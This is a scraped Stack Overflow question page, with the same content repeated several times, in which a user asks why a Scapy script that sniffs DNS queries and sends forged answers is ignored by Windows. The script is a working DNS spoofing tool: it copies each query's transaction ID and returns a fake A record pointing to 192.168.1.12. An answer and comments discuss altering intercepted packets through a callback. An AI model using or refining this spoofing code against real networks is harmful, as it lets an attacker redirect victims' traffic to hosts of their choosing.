Fake DNS response
I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks
import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)
python sockets dns response scapy
add a comment |
I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks
import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)
python sockets dns response scapy
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
add a comment |
I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks
import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)
python sockets dns response scapy
I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought...
Can someone tell me how to fix it please?
Thanks
import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)
python sockets dns response scapy
python sockets dns response scapy
edited Nov 12 '18 at 19:02
Liron
asked Nov 12 '18 at 18:12
LironLiron
83
83
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
add a comment |
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51
add a comment |
1 Answer
1
active
oldest
votes
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
The "manipulate your DNS packet here then forward it" is exactly what the code does in thewhile True
,sendp
is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that usingprn
uses the same socket instance, and has improved performances.
– Cukic0d
Nov 20 '18 at 22:21
add a comment |
Your Answer
StackExchange.ifUsing("editor", function () {
StackExchange.using("externalEditor", function () {
StackExchange.using("snippets", function () {
StackExchange.snippets.init();
});
});
}, "code-snippets");
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "1"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53267828%2ffake-dns-response%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
The "manipulate your DNS packet here then forward it" is exactly what the code does in thewhile True
,sendp
is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that usingprn
uses the same socket instance, and has improved performances.
– Cukic0d
Nov 20 '18 at 22:21
add a comment |
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
The "manipulate your DNS packet here then forward it" is exactly what the code does in thewhile True
,sendp
is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that usingprn
uses the same socket instance, and has improved performances.
– Cukic0d
Nov 20 '18 at 22:21
add a comment |
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
answered Nov 13 '18 at 6:27
Ali KargarAli Kargar
1444
1444
The "manipulate your DNS packet here then forward it" is exactly what the code does in thewhile True
,sendp
is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that usingprn
uses the same socket instance, and has improved performances.
– Cukic0d
Nov 20 '18 at 22:21
add a comment |
The "manipulate your DNS packet here then forward it" is exactly what the code does in thewhile True
,sendp
is exactly the function that sends the packets...
– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that usingprn
uses the same socket instance, and has improved performances.
– Cukic0d
Nov 20 '18 at 22:21
The "manipulate your DNS packet here then forward it" is exactly what the code does in the
while True
, sendp
is exactly the function that sends the packets...– Patrick Mevzek
Nov 13 '18 at 22:51
The "manipulate your DNS packet here then forward it" is exactly what the code does in the
while True
, sendp
is exactly the function that sends the packets...– Patrick Mevzek
Nov 13 '18 at 22:51
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
When you sniff a packet and assigns it to a variable it means you grab the packet's information and send it to the destination after that you'll send a fake one but with prn and sending the packet to a function you grab the origenal and manipulate the original.
– Ali Kargar
Nov 14 '18 at 8:46
@AliKargar that last comment of yours is wrong: the cases are very similar, except that using
prn
uses the same socket instance, and has improved performances.– Cukic0d
Nov 20 '18 at 22:21
@AliKargar that last comment of yours is wrong: the cases are very similar, except that using
prn
uses the same socket instance, and has improved performances.– Cukic0d
Nov 20 '18 at 22:21
add a comment |
Thanks for contributing an answer to Stack Overflow!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53267828%2ffake-dns-response%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Maybe the true packets are coming faster than yours? Did you compare both replies and see differences?
– Patrick Mevzek
Nov 13 '18 at 22:51